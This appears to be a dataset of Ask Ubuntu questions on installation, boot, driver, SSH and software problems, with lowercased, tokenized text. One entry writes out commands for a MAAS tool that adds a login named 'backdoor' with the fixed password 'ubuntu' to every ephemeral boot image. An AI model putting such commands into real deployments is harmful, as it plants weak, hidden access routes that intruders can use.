499258	enable multiple touches on touchpad	i have a vaio laptop , where the touchpad contains the two buttons ( primary and secondary ) . this means you have to click your touchpad to click on things . the buttons are not separate to the touchpad . this is a problem because i normally have two fingers on the pad at a time , one to move the cursor across the screen , and one to click on things . but in ubuntu , two fingers means scrolling , so if one uses two fingers on the touchpad , the cursor stops moving . i have tried : disabling 'two finger scroll ' in settings , but this has had no effect on my problem . pastebin of $ synclient -l : http : //pastebin.com/wkcxuppl pastebin of xinput -- list-props < id of my touchpad > : http : //pastebin.com/dauldpy4 i have tried putting this : section `` inputclass '' matchistouchpad `` on '' identifier `` touchpads '' driver `` mtrack '' endsection into my /etc/x11/xorg.conf file but that completely disables the touchpad . might i not have mtrack installed ? how do i find out if i have the right driver ? an acceptable solution is to disable a small area at the bottom of the trackpad ( preferably bottom left ) , but i do n't know how to do this ? thanks
499259	14.04 install does not start	trying to install 14.04 on a dell xpsl702x . using external cd reader . loaded bios defaults , tried sata in ahci/ata modes , did n't matter . setup will sit at the ubuntu dots forever . restart , hit escape to see startup text . usually around `` setting up x socket directories '' it will stop , with this text https : //www.dropbox.com/s/2g1mxjc92zopjts/2014-07-17 % 2016.57.46.jpg
499260	asus x552vl freezez when on battery	i just bought a new asus x552vl laptop and i have already had a couple of bugs with ubuntu 14.04 but managed to fix most of them . now i have a problem with laptop freezing when on battery . i guess it 's a kernel panic , but i 'm not sure . what should i do , and what kind of information would be useful to fix this problem .
499262	will my hp officejet 6600 print and scan on ubuntu ?	i am on xp ready to try ubuntu . will my hp 6600 print , scan and work wirelessly ? how about programs like dragon simply speaking , autocad and garmim map updates ?
499264	how to set up grub2 password in an easy way ?	i need to setup password for grub2 on ubuntu 14.04 lts amd64 . the setup i am trying to reach is to have [ e ] dit and [ c ] onsole options protected by password , but booting of operating system entries ( ubuntu , windows ) unprotected . i have studied grub2/passwords ( it is outdated , quite chaotic and hardly readable by the way ) and it seems that i need to set up the superuser password and add -- unrestricted option to menu entries . ok , but where exactly do i have add this -- unrestricted option ? if in the /boot/grub/grub.cfg then it is not the most clever idea , because this file is overwritten each time grub-update is run . so this is not an option for me , because - let 's assume that - i like to change grub background image twice a week . moreover , /boot/grub/grub.cfg readability is far from perfect ; it is still not obvious where to put the -- unrestricted option . if in the menu entry files in the/etc/grub.d/* , then it is even worse than editing /boot/grub/grub.cfg . those files are quite a mess in the terms of readability so editing them is all the more difficult . is there any clean and easy method of setting grub2 password up as i described ? maybe some brilliant documentation other than the one i linked in this post ?
499267	can i donate less than $ 1 that ?	i 'd like to donate to ubuntu team less than 1 usd ( 0,42 ) , can i do that ? or has to be an amount greater than $ 1 ?
499268	strange bug with sound slider	i have a strange bug with sound slider in ubuntu 14.04 . this problem was described here too but with no answer and the author was using another desktop - i 'm using default unity . i can confirm that slider bugged after installation of ubuntu sdk , so i think we can be sure this cause the problem . i 've uninstalled ubuntu sdk with this commands : $ sudo apt-get autoremove ubuntu-sdk $ sudo apt-get -- purge remove ubuntu-sdk $ sudo apt-get autoclean $ sudo apt-get autoremove $ sudo apt-get -f install but the slider is still buggy . i 've made two gifs to show what 's happening . on the first one , i 'm scrolling ( mouse , touchpad ; yes , i 've checked another mouse ) only up , a few times . after some time i clicked sound bar icon and stopped scrolling instantly but as you can see it moves itself randomly . on the second one i 'm doing exactly same thing but with scrolling only down a few times . scrolling up scrolling down this problem occurs only with desktop sound slider ( notification slider ) . there is no any problems with scrolling other things in the whole system . in ubuntu sound settings , everything is fine with slider too . i have three questions : how to get rid of this problem ? have i uninstalled ubuntu sdk correctly ? what more can i remove to be sure that every file related or changed during installation of sdk has been removed ? what is the best way to inform ubuntu sdk/ubuntu developers of this bug ? update please confirm this bug here if it affects you as well . https : //bugs.launchpad.net/ubuntu/+source/indicator-sound/+bug/1343962
499269	ca n't access windows 8.1. in dual boot	windows 8.1 pro was running on my pc . i booted ubuntu 14.04 . lts for making dual boot . everything was perfect while installing ubuntu but at the end when i restarted my comp it did n't ask me which os i want to use ( it had to ask if i 'm not mistaken ) . now ubuntu is running on my pc and i ca n't use windows 8.1 . and i had two drivers which ubuntu shows but can '' t access because of hybernation problems . please help ...
499270	wireless connection unavailable after hardware update	was prompted to upgrade due to hardware support expiring . tried to do this using the update manager tool but that failed due to dependency issues . found solution online by googling error message and manually updated hardware support . upon reboot the laptop ( toshiba satellite c75d-a7370 ) has no option to connect via wireless . sorry for lack of details , since i ca n't connect the laptop to internet i ca n't reconnect to the links to the hardware update solution used .
499271	ubuntu thinks node is missing ?	when i start a terminal on my laptop , it shows this on starting up : no command 'node ' found , did you mean : command 'ode ' from package 'plotutils ' ( universe ) command 'node ' from package 'node ' ( universe ) command 'node ' from package 'nodejs ' ( universe ) node : command not found owner @ g575 : ~ $ i believe this is the result of failed node install . i followed suggestions on removing traces of node , nodejs , npm . running command which node returned nothing . does anyone have any suggestions on anything i could search for in an attempt to repair this problem ?
499274	new ubuntu server and php	i just installed a fresh version of ubuntu 14.04 server on one of my computers . i installed everything to make it run like a typical web server ( including php ) . my problem is , i have a contact form written in php that i 'm running on my site and in it , i have a fail safe in case something goes wrong with submitting the form , which is what is happening . the script runs fine on any other server . but on mine , it goes to my message failed function every time i try to submit the form . i happen to think it 's something wrong with the way php is configured on my server . any ideas ? here is the php script if anyone wants to test it : < ? php $ field_name = trim ( $ _post [ 'cf_name ' ] ) ; $ field_email = trim ( $ _post [ 'cf_email ' ] ) ; $ field_subject = trim ( $ _post [ 'cf_subject ' ] ) ; $ field_message = trim ( $ _post [ 'cf_message ' ] ) ; if ( empty ( $ field_name ) & & empty ( $ field_email ) & & empty ( $ field_subject ) & & empty ( $ field_message ) & & ! preg_match ( `` / ( [ \w\- ] +\ @ [ \w\- ] +\ . [ \w\- ] + ) / '' , $ field_email ) ) { ? > < script language= '' javascript '' type= '' text/javascript '' > alert ( 'one or more fields are invalid . please fill out any empty fields and make sure your email address is valid . ' ) ; window.location = 'contact.html ' ; < /script > < ? php } else if ( empty ( $ field_name ) ) { ? > < script language= '' javascript '' type= '' text/javascript '' > alert ( 'please type in your name . ' ) ; window.location = 'contact.html ' ; < /script > < ? php } else if ( empty ( $ field_email ) ) { ? > < script language= '' javascript '' type= '' text/javascript '' > alert ( 'please type an email address . ' ) ; window.location = 'contact.html ' ; < /script > < ? php } else if ( empty ( $ field_subject ) ) { ? > < script language= '' javascript '' type= '' text/javascript '' > alert ( 'please type a subject . ' ) ; window.location = 'contact.html ' ; < /script > < ? php } else if ( empty ( $ field_message ) ) { ? > < script language= '' javascript '' type= '' text/javascript '' > alert ( 'please type a message . ' ) ; window.location = 'contact.html ' ; < /script > < ? php } else if ( ! preg_match ( `` / ( [ \w\- ] +\ @ [ \w\- ] +\ . [ \w\- ] + ) / '' , $ field_email ) ) { ? > < script language= '' javascript '' type= '' text/javascript '' > alert ( 'please enter a valid email address . ' ) ; window.location = 'contact.html ' ; < /script > < ? php } else { $ mail_to = 'youremail @ yourdomain.com ' ; $ subject = `` new message from ... '' ; $ body_message .= 'a message from a user of ... ' . `` \n\n '' ; $ body_message .= 'from : '. $ field_name . `` \n '' ; $ body_message .= 'e-mail : '. $ field_email . `` \n '' ; $ body_message .= 'subject : '. $ field_subject . `` \n '' ; $ body_message .= 'message : '. $ field_message ; $ headers = `` from : '' ; $ mail_status = mail ( $ mail_to , $ subject , $ body_message , $ headers ) ; if ( $ mail_status ) { ? > < script language= '' javascript '' type= '' text/javascript '' > alert ( 'thanks for contacting me ! i will respond as soon as possible . ' ) ; window.location = 'contact.html ' ; < /script > < ? php } else { ? > < ! -- this is triggering every time i submit the form -- > < script language= '' javascript '' type= '' text/javascript '' > alert ( 'message failed . please try again later . ' ) ; window.location = 'contact.html ' ; < /script > < ? php } } ? > edit the hosting side of things works fine .
499275	how to set usb drive with executable permission	i have steam on my chromebook ( acer c710 ) with saucy , unity . i was just about to download dota 2 when i did n't have enough space on my device , so i had a spare usb flash drive ( sandisk cruzer faucet ) and i tried to download it directly to there . everything would have went fine , except i ran into an error : '' your file system must have executable permission '' . i want to know how i could mount my usb drive with executable permission . thank you .
499278	trouble starting dualboot with grub 2:02 ( windows 7 over ubuntu 14.04 lts )	i have a problem in grub to start . i installed ubuntu 14:04 lts shortly after installing windows 7 on the hd partitions due . when i restarted the machine appeared the following message ... minimal bash-like line editing is supported . for the first word , tab lists possible command completions . anywhere else tab lists possible device or file completions . grub > the installed grub and the gnu grub version 2.02 beta 2-9 now i can not have access to windows or ubuntu . what did hap ? how to solve this problem ? i thank
499280	why do people install outdated versions of ubuntu ?	i 'm really surprised to see so many people are currently ( after release of 14.04 ) installing ubuntu versions 13.04 and older . apart from 12.04 , these are not supported any more . i can see that someone really conservative will install ubuntu 12.04 , but anything else is just surprising to me . can someone enlighten me ?
499282	installation did not complete	am new to ubuntu . i am trying to dual boot ubuntu 14.04 with windows 7 . i followed the installation instructions for flash drive until it did prompt me to restart . i restarted immediately but on reboot it did not continue with the installation . it has not completed the installation since it still require the removable media to boot fully . please help on what i did wrong and on what i can do to complete the installation successfully .
499284	inkscape fails to install on 14.04	i am trying to install inkscape on ubuntu 14.04 lts using apt-get . after a seemingly successful installation , i can not seem to run inkscape . i get the following terminal output : matt @ linuxdesk : / $ sudo apt-get install inkscape reading package lists ... done building dependency tree reading state information ... done inkscape is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 6 not upgraded . matt @ linuxdesk : / $ inkscape the program 'inkscape ' is currently not installed . you can install it by typing : sudo apt-get install inkscape i have a second computer , also running ubuntu 14.04 , and i was able to install and run inkscape on that computer without issue . i ran find /usr -name inkscape on the computer with the working install , and the command returned a huge number of files . running the same command on the computer with the broken install yields : /usr/lib/mime/packages/inkscape /usr/share/menu/inkscape /usr/share/doc/inkscape this suggests to me that apt-get thinks that inkscape is installed , but then for some reason only installs some of the files . i 've tried completely wiping inkscape from the computer and starting over using : sudo apt-get purge inkscape sudo apt-get autoremove these commands did not seem to remove all inkscape files , so i even tried going in and removing them manually . still to no avail . after trying various permutations of the above , i attempted to install from source . i ( think ) that i got all of the dependencies , and ./configure runs fine . unfortunately running the makefile fails : matt @ linuxdesk : ~/downloads/inkscape-0.48.4 $ make make all-recursive make [ 1 ] : entering directory `/home/matt/downloads/inkscape-0.48.4' making all in src make [ 2 ] : entering directory `/home/matt/downloads/inkscape-0.48.4/src' cxx desktop.o in file included from desktop.cpp:91:0 : widgets/desktop-widget.h:242:32 : error : stray â , â at end of member declaration gtkwidget *commands_toolbox , ; ^ make [ 2 ] : *** [ desktop.o ] error 1 make [ 2 ] : leaving directory `/home/matt/downloads/inkscape-0.48.4/src' make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : leaving directory `/home/matt/downloads/inkscape-0.48.4' make : *** [ all ] error 2 matt @ linuxdesk : ~/downloads/inkscape-0.48.4 $ any suggestions would be much appreciated - i 'm quite out of ideas . thanks !
499287	failed boot ... ?	so here 's the order in which things happen after turning on the computer : it shows the motherboard splash screen quickly . it goes to a screen where the options are to boot ubuntu and do a couple of other things . it goes to a blank screen and stays there for 5 minutes . it goes to a blank screen with a cursor and stays there for 3 minutes . it goes to an error screen that says : mount : mounting /dev/disk/by-uuid/e0c8ee17-6c22-43a4-ab42-d3c2a431664d on /root failed : invalid argument mount : mounting /dev on /root/dev failed : no such file or directory mount : mounting /sys on /root/sys failed : no such file or directory mount : mounting /proc on /root/proc failed : no such file or directory target filesystem does n't have requested /sbin/init . no init found . try passing init= bootarg . busybox v1.21.1 ( ubuntu 1:1.21.0-1ubuntu1 ) built-in shell ( ash ) enter help for a list of built-in commands how do i fix this ?
499290	config file accidentally deleted	i accidentally deleted the kernel config file found in /boot . so i have 2 questions . does this affect the system by any means ? and i am trying to compile the linux kernel now and was looking to using the ubuntu config file and build on it so where can i get a valid config file ? i am on ubuntu 14.04 lts using kernel 3.13
499291	ca n't see partitions and there is no windows 8 in grub	i had windows 8.1 on my laptop . i have installed ubuntu 14 04 and then when i restarted the computer there was no grub . and an automatic ubuntu loading . then i tried boot-repair . after that there was grub without windows 8 in it . what can i do ? p.s 1 : my partitions were 3 ntfs for windows and 1 for ubunto . but now when i put a windows bootable cd , there is only one big partition ( sum of those 3 without any free space ) p.s 2 : both os are 64 bit . p.s 3 : if there is something else that i should mention please tell me . http : //ubuntuforums.org/showthread.php ? t=1940734 http : //strangelyperfect.tv/6415/how-to-convert-a-dynamic-disk-to-basic-disk-in-windows-7/ # sthash.vg8xjuwp.dpbs these two seems to be related to my problem . still any help would be highly welcomed .
499293	macbook air 2013 wo n't wake after opening lid 14.04	i 've got a 13 '' mid-2013 macbook air , and i 'm dual booting osx and xubuntu . everything seems to be working relatively well except waking the laptop by opening the lid . the screen lights up to the login screen for just under a second , and then disappears . no keyboard commands will wake it , my brightness does n't change either . i have to hold the power button and reboot to get back into the os . does anybody have any idea how i can get this fixed ?
499297	help on ubuntu for powermac g5	here 's my problem i have the powermac g5 tower . when i tell ubuntu 12.04 to install i get to tell it to install the screen gos white then black . after in 2mins the screen is still black and the tower fans go on full speed . can someone help me please i 'm new to this and like to learn .
499299	black screen when using nomachine ( server is using freenx ) failed gnome session ?	i was following instructions from here : http : //www.drivard.com/2012/06/installation-freenx-server-ubuntu-12-04-lts-precise/ i installed freenx on my server ( ubuntu 14.04 ) . i am able to remotely ssh into the server . using nomachine ( which has been tested with other servers and work on the client ) i was able to connect to the server but the screen was black . the process for connecting to the server is : set up the connection ( via ssh using the 'nomachine login ' option ) . connect , entering password and username chose 'start gnome session' then black screen . i successfully managed this process other times . i really have no idea whats not working . edit : resetting the server does n't help the problem persists when using different nomachine clients bump
499303	photosmart 7520 set up	i 'm running ubuntu 14.04 . i am trying to set up a photosmart 7520 wireless . i have the drivers that 's supposed to work . 3.12.9 , but the error message says it ca n't find the printer . the printer 's config . print out lists my computer as a mac . i am really , really new at this and i have n't ever done anything more involved than use the computer . any help there for me ?
499304	dual booting ubuntu 14.04 from windows 8 issues no answer anywhere	i 'm having so many issues installing booting ubuntu 14.04 on a machine that i installed windows 8.1 on first . i created a bootable usb drive , went through the ubuntu installation setup , and then when i finished i restarted the computer and only the ubuntu option . however , the grub menu for ubuntu was the same as the menu pre-installation . the options were `` try ubuntu before install '' and `` install ubuntu . '' i removed the usb drive , and after restarting there was no ubuntu option . booted directly into windows 8 . i 've tried pretty much everything on the internet , i 've boiled my problems down to ( i think ) : -not being able to turn of secure boot . everyone says enter the windows 8 boot menu and click `` uefi firmware settings , '' but i have no option for that , it does n't appear in the area it should . windows is on bios legacy , i think , and when i tried to alter the bios setup to just uefi it would n't detect either of windows or ubuntu . there is also no option to change secure boot in my bios . -when i change the order boot options ( i have 2 drives , one ssd with windows 8 , and i installed ubuntu onto partitions of my 1 tb hdd ) to start with the hdd first , it does n't find any operating system . when i reinsert the usb the grub menu opens up , i can enter the trial version of ubuntu and if i try to go through reinstall , it informs me that it is already installed . any help would be appreciated !
499307	installing brother pcl5 driver	i am deploying a print server with ubuntu , and would like to know if you have to install this windows brother pcl5 generic driver . all of the desktops have the windows brother pcl5 driver , and i need it installed to be able to print reports from a program which we use .
499312	how can i run ubuntu on my droid x2 ?	how can i install ubuntu alongside android gingerbread on my droid x2 so that on boot it asks which os to boot to ?
499315	unable to repair grub with boot repair	i installed ubuntu on my laptop , which came with win 8.1 preinstalled , with uefi of course . so , i disabled secure boot and i installed without much interruption , but i realized that i could only boot into win 8.1 , but not into ubuntu . then i googled it and came across boot repair , which i installed with my live usb . after i ran it , i selected the recommended repair option , and i started entering all of the commands but , this command : sudo chroot `` /mnt '' apt-get install -y -- force-yes grub-efi-amd64-signed shim-signed linux-signed-generic produced this error : the following information may help to resolve the situation : the following packages have unmet linux-signed-generic : depends : linux-headers-generic ( = 3.13.0.32.38 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . does anyone know how to fix this ?
499316	how to create a backdoor ( add a login ) to ephemeral images	can anyone tell me , if this is a script that needs to be created or are these commands that need to be entered ? now , i do know that some are commands . i have no idea what the rest are . and do i enter these from the maas server ? sudo apt-get install -- assume-yes bzr bzr branch lp : ~maas-maintainers/maas/backdoor-image backdoor-image imgs= $ ( echo /var/lib/maas/boot-resources/*/*/*/*/*/root-image ) for img in $ imgs ; do [ -f `` $ img.dist '' ] || cp -a -- sparse=always $ img $ img.dist done for img in $ imgs ; do sudo ./backdoor-image/backdoor-image -v -- user=backdoor -- password-auth -- password=ubuntu $ img done
499318	virtual machine ( ubuntu ) can not connect to internet	my host is windows 7 and my guest ( virtual machine ) is ubuntu . i can not connect to internet when i am on virtual environment . i am using oracle virtualbox . any idea ? thanks .
499320	woofer in laptop not working	after installing 14.04 i ca n't get the woofer in my speakers to work.i have a samsung laptop it has jbl speakers
499322	upgrade fail 12.04 to 14.04	i made a horrible mistake and upgraded from 12.04 ( dual boot win7 ) to 14.04 directly , and it failed and i am left with a scrambled screen which does not respond to anything . any way i can recover my system ?
499323	would apparmor protect against a bug like heartbleed ?	is it capable of `` containing '' /preventing the exploitation of things such as this ?
499325	why is incorrect passsword check slow ?	observed it many times on many ubuntu versions . if you type wrong password either in ui mode or in terminal , it takes little more time before it declares incorrect password . correct password check is almost instantaneous , but incorrect password takes slightly longer . its not lot of time , but still lot more than correct password . why is it so ?
499326	i need help to install wine , synaptic , and samsung scx-340sw driver	i need to install wine and synaptic installer.i 've tried finding it but no luck.i also need drivers for my wireless printer , it is a samsung scx-340sw .
499330	ubuntu terminal mail client	i am looking for an e-mail client in the form of a terminal/console application . does such an app exist on ubuntu 14.04 ? i 've yet to find one .
499331	how do i upload photos from my camera ?	i 'm using ubuntu 14.04 , i 'm incredibly new at using it , and i 'm trying to upload photos from a nikon camera .
499342	bash script to enable / disable ssh	im running ubuntu 14.04 lts ( no gui ) and im looking to write a bash script that does the following : check to see if the ssh service is enabled or disabled if enabled , then disable , if disabled then enable . every time i run this script it should turn on/off the ssh service .
499343	using nvidia visual profiler ubuntu 14.04 cuda 5.5	i have just installed cuda 5.5 on ubuntu 14.04 lts machine . everything works fine . basic cuda programs are being executed with nvcc command . i need to optimize my code and hence require the use of nvidia visual profiler provided by the toolkit . how do i profile my basic cuda program which is a .cu extension using nvidia visual profiler .
499348	can i install 14.04 over pre-installed 12.04 desktop ?	can i install 14.04 over pre-installed 12.04 desktop on an asus x200ca notebook pc ? and will the new version 14.04 replace the 12.04 version ?
499350	install windows 8 alongside ubuntu 12.04	i have 2 partition in my laptop and already installed ubuntu 12.04 . my question is how can i install windows 8 without overiding my ubuntu grub . i searched over the forum and there are grub related problems after installing windows 8 alongside ubuntu . i really appreciate if you guys can help me .
499353	i need to change the graphics card depending on what i want to do	in the beginning of this year i bought a secondhand computer . the cpu is an intel 3.4 ghz dual core and the gpu is an amd rv410 . i installed ubuntu 12.04 on it , and it worked wonderfully , as usual with ubuntu . but there are some games i want to play , in this case eternal lands , that required little more than the absolute most basic graphical functions , so i bought a new card for this , an amd radeon hd 7750 . i put this in instead , and after a little trying and fixing with drivers , needed both one of the three suggested drivers in the system options/more driver routines , and catalyst from the ubuntu software center , i got it to work properly as a graphic card . nice , but where did the sound go ? doing everything that the internet could offer to get the sound to work , it ended up in a description from `` the ultimate sound card guide '' that crashed my system . i reinstalled ubuntu five times . it worked poorly ; firefox crashed when i right-clicked mozilla among other things . i put in my old rv410 card instead , and ubuntu was back on track with full sound everywhere . i switched cards again , no catalyst from the ubuntu software center anymore ; i installed it from amd instead , chose a drive routine , and my game worked again , with excellent graphics , but no sound , neither in game nor in system . it 's quiet . i wo n't touch the sound system again ; it will crash if i do that . so when i want to do something that require sound , i put in the old card , and if i want to play this ( or similar ) games , i put in the new card , getting a quiet ubuntu with better graphics . it 's awkward , but it 's the only choice i have . is there a solution to this that wo n't wreck my ubuntu ?
499355	where to download ubuntu that comes with cd ?	where to download ubuntu that comes with cd ? i like to download the entire cd .
499356	how to check a folder timestamp ?	how to get file information inherent to time : such as last modification time , recent access time and so on . also i would like to know if it is possible to check all the modification dates of a file or the times the file was modified and when . thanks .
499360	how to change terminal prefix to $	my xterm always print : tony @ tony-thinkpad-edge-e540 : ~ $ i want it to print only ~ $ how can i do that ?
499361	black screen after booting ubuntu 14.04 lts	i 'm new to ubuntu 14.04 . i changed some configuration and installed gnome . i chose display manager as gdm . after i restart , it boots but the login window does not appear . it shows a black screen without any user interface tool .
499363	how do i enter my sudo password ?	i know my sudo password but terminal not to permit me to enter any keyword into
499365	cant have passworldess ssh between 2 ec2 servers - permission denied ( publickey )	i created 2 aws ubuntu 12.04 servers i uploaded the id_rsa and id_rsa.pub files to both servers i ran the below on both servers chmod 600 id_rsa* eval `ssh-agent -s` ssh-add ~/.ssh/id_rsa what did i do wrong ? ssh ubuntu @ ec2-54-183-89-212.us-west-1.compute.amazonaws.com the authenticity of host 'ec2-54-183-89-212.us-west-1.compute.amazonaws.com ( 172.31.5.34 ) ' ca n't be established . ecdsa key fingerprint is 2a:3a:43:9d : e8 : aa:50:2f : f3:83 : c4 : e2:2e : b2 : f2 : e7 . are you sure you want to continue connecting ( yes/no ) ? yes warning : permanently added 'ec2-54-183-89-212.us-west-1.compute.amazonaws.com,172.31.5.34 ' ( ecdsa ) to the list of known hosts . permission denied ( publickey ) .
499370	change default font properties when composing mail in evolution	i 'm using evolution as a mail client . by default it 's using some fonts ( really i do n't know ) in mail . but i would like to change the font family , size and colour when i 'm composing the mail to someone . when i googled i got the following links and i applied the same in my local but no use . can you please help me to make beauty my mail ? : ) http : //web.mit.edu/iahn/evolution/gtkrc-mail-fonts note : i do n't like any suggestion to switch over to other mail clients .
499372	ca n't run sqldeveloper on ubuntu	i tried to install sqldeveloper by following way : download sql developer from oracle website ( i chose other platforms download ) . extract file to /opt : sudo unzip sqldeveloper-*-no-jre.zip -d /opt/ sudo chmod +x /opt/sqldeveloper/sqldeveloper.sh linking over an in-path launcher for oracle sql developer : sudo ln -s /opt/sqldeveloper/sqldeveloper.sh /usr/local/bin/sqldeveloper edit /usr/local/bin/sqldeveloper.sh replace it 's content to : # ! /bin/bash cd /opt/sqldeveloper/sqldeveloper/bin ./sqldeveloper `` $ @ '' run sql developer : sqldeveloper but it shows next output : nazar @ lelyak-desktop : /opt/sqldeveloperâť ./sqldeveloper.sh oracle sql developer copyright ( c ) 1997 , 2014 , oracle and/or its affiliates . all rights reserved . load time : 401 # # a fatal error has been detected by the java runtime environment : # # sigsegv ( 0xb ) at pc=0x00007f3b2dcacbe0 , pid=20351 , tid=139892273444608 # # jre version : java ( tm ) se runtime environment ( 7.0_65-b17 ) ( build 1.7.0_65-b17 ) # java vm : java hotspot ( tm ) 64-bit server vm ( 24.65-b04 mixed mode linux-amd64 compressed oops ) # problematic frame : # c 0x00007f3b2dcacbe0 # # core dump written . default location : /opt/sqldeveloper/sqldeveloper/bin/core or core.20351 # # an error report file with more information is saved as : # /tmp/hs_err_pid20351.log # # if you would like to submit a bug report , please visit : # http : //bugreport.sun.com/bugreport/crash.jsp # /opt/sqldeveloper/sqldeveloper/bin/../../ide/bin/launcher.sh : line 1193 : 20351 aborted ( core dumped ) $ { java } `` $ { app_vm_opts [ @ ] } '' $ { app_env_vars } -classpath $ { app_classpath } $ { app_main_class } `` $ { app_app_opts [ @ ] } '' 134 nazar @ lelyak-desktop : /opt/sqldeveloperâť java -version java version `` 1.7.0_65 '' java ( tm ) se runtime environment ( build 1.7.0_65-b17 ) java hotspot ( tm ) 64-bit server vm ( build 24.65-b04 , mixed mode ) here is content of /tmp/hs_err_pid20351.log how to solve this trouble ?
499375	why do installing ati radeon hd4200 on my laptop would mess the things up ?	so i have been using ubuntu 12.04 as my only os for the last six months and so far i have to tell is pretty good , easy to use , i like the interface and how it 's so intuitive and very smooth and one of the things i enjoy the most are the music player and the documents reader wich are very easy to use and have a nice interface . however as a former programmer ( i like to do it mostly as a hobby on c++/opengl/sdl/c # /python ) i think something is likely to be not quite right , for example when i create a cube on opengl ( which is a pretty basic procedure ) everything just slows down , and the first thing that comes to my mind is the possibility that the graphic card drivers might not be installed or correctly configured given this situation i proceed to download and install the corresponding drivers . but ... everytime i try everything gets messed up , before it everything is fine . ubuntu just runs perfectly in every sense except for that small detail so i 'm wondering : what can i do , i have been reading several tutorials on the subject and after messing things up reinstalling ubuntu but nothing seem to work , i have also been thinking of installing ubuntu studio but idk . any sugestions ?
499376	bash history not saved after closing terminal	i recently replaced my ubuntu 14.04 installation with ubuntu gnome ( which comes with gnome de ) . but i noticed that bash history is not saved once the terminal session is closed . once i close a terminal session and open a new one , and run the command history it does not show anything other than the history command itself . is there any way to solve this issue ? thank you
499379	why are all my dns queries received from 127.0.0.1 ?	i used the host command on ubuntu 12.04 lts to check my dns server : host -a www.amazon.com showing this : trying `` www.amazon.com '' ; ; - > > header < < - opcode : query , status : noerror , id : 22892 ; ; flags : qr rd ra ; query : 1 , answer : 3 , authority : 0 , additional : 0 ; ; question section : ; www.amazon.com . in any ; ; answer section : www.amazon.com . 60 in soa ns-942.amazon.com . root.amazon.com . 1405660589 3600 900 7776000 60 www.amazon.com . 7 in a 72.21.194.212 www.amazon.com . 412 in ns ns-942.amazon.com . received 110 bytes from 127.0.0.1 # 53 in 176 ms why received form 127.0.0.1 ? i 've tried different websites , and moved to different locations trying this command . the dns server shown is always the same : 127.0.0.1 . why ?
499381	no networks available , can not connect to wired	i just repair installed ubuntu 14.04 after messing up my old installation . after multiple tries i finally got it installed again after changing boot from uefi to legacy . however , i now can not connect to any networks . wired connections do n't work and no wifi networks are detected . all the solutions i 've seen to this require downloading packages , but i ca n't do that because i ca n't connect to the internet at all . i 'm at a complete loss for what to do . things to note : i did switch to legacy boot , which i 'm pretty sure is n't how you 're supposed to do it , but uefi messed up the resolution and resulted in error messages . also , every time i tried to reinstall ubuntu i got a message about creating a reserved bios boot partition , but i could n't figure it out so i just skipped it . help is greatly appreciated !
499382	rstudio ui with ubuntu 14.04 system fonts under root	i am using rstudio on ubuntu 14.04 . without launch the rstudio via root `` sudo rstudio '' , rstudio is not able to install the package in the native r library folder , and also can not open project even though it can be created . so i always start rstudio via root . however the problem is that the rooted rstudio ui no longer looks nice , especially the fonts of the drop down menus and its color . how can i change the settings or configurations on ubuntu to make rooted rstudio use system fonts and colors ? without root link with root link
499385	problem to write .csv file using r in 14.04	i just installed , i have done some mathematical calculation successfully with r. then i try the following , > var1 < - 1:5 > var2 < - ( 1:5 ) / 10 > var3 < - c ( `` r '' , `` and '' , `` data mining '' , `` examples '' , `` case studies '' ) > df1 < - data.frame ( var1 , var2 , var3 ) > names ( df1 ) < - c ( `` variableint '' , `` variablereal '' , `` variablechar '' ) after created data frame i tried to write into sampledata.csv for that i do the following , > write.csv ( df1 , `` ./data/sampledata.csv '' , row.names = false ) i got [ error ] response as , error in file ( file , ifelse ( append , `` a '' , `` w '' ) ) : can not open the connection in addition : warning message : in file ( file , ifelse ( append , `` a '' , `` w '' ) ) : can not open file './data/sampldata.csv ' : no such file or directory > i am using ubuntu 14.04 , and i run this code in terminal . problem cause in directory . when i do , > getwd ( ) got response as , [ 1 ] `` /home/arul '' but in that directory there is no r package . i cant find where my r is placed , i used apt-get install -y r-base , so how do i set path as installed r ? edit 1 i create folder data in current directory /home/arul as taken by r and then i tried to write csv , > write.csv ( df1 , `` ./data/sampledata.csv '' , row.names = false ) now i got permission problem , error in file ( file , ifelse ( append , `` a '' , `` w '' ) ) : can not open the connection in addition : warning message : in file ( file , ifelse ( append , `` a '' , `` w '' ) ) : can not open file './data/dummydata.csv ' : permission denied how to i solve it ? edit 2 root @ arul-pc : /home/arul # stat data file : âdataâ size : 4096 blocks : 8 io block : 4096 directory device : 809h/2057d inode : 3147229 links : 2 access : ( 0755/drwxr-xr-x ) uid : ( 0/ root ) gid : ( 0/ root ) access : 2014-07-18 12:42:00.057099167 +0530 modify : 2014-07-18 12:41:59.041099204 +0530 change : 2014-07-18 12:41:59.041099204 +0530 birth : - edit 3 > system ( 'whoami ' , intern=true ) [ 1 ] `` arul ''
499387	no option to boot up from live cd	so i 've been trying non-stop to get xubuntu linux for 3 days now and i keep running into new problems . the problem i have now is that whenever i try to boot up from a live cd in the windows 8 version of bios ( uefi ) there is no boot option so i ca n't change the boot order . i 've attempted using live usbs and those did n't work , i 've turned off secure boot but that did n't work either , the burn on the cd was successful , i had the option to boot from a live usb but all that did when i changed the boot order was start windows again , and i 've done tons of research but none of it works because they 're uefi is different than mine . i 'm not able to get any motherboard information from the manufacturer . my computer is the asus g750jw . i have windows 8 64-bit . any help is much appreciated !
499390	does ubuntu store data of external media/drives ?	i keep confidential data ( docs , spreadsheets , images , etc ) on usb sticks or discs . i plug/insert them to access the data when i need , and put them back in a drawer when i 'm done . does ubuntu store this data ( in cache , or somewhere else ) if yes ... where ? for how long ? how to delete this from ubuntu ? how to stop ubuntu storing this data in the first place ? p.s . : i 'm already aware of the cache directory to store image thumbnails , but i 'm asking now in terms of the entire file being stored . thanks .
499393	3d stereoscopic with nvidia	i have a 3d compatible tv ( over hdmi ) and a nvidia gtx660 ( should be 3d compatible and has a hdmi port ) . can i make things in 3d ? ( watch a movie in mkv , playminecraft with stereoscopic mod ... ) thank you
499397	save display configuration , depending on the connected displays	i was wondering why ubuntu does not save the display configuration , depending on the connected displays . i have a laptop using a dockingstation . if the laptop is connected to the dockingstation i want a different display configuration than when my laptop is not connected to the dockingstation . why is this not the default behavior ? i am using the nvidia driver 331.38 . i set the display configuration in the nvidia-settings .
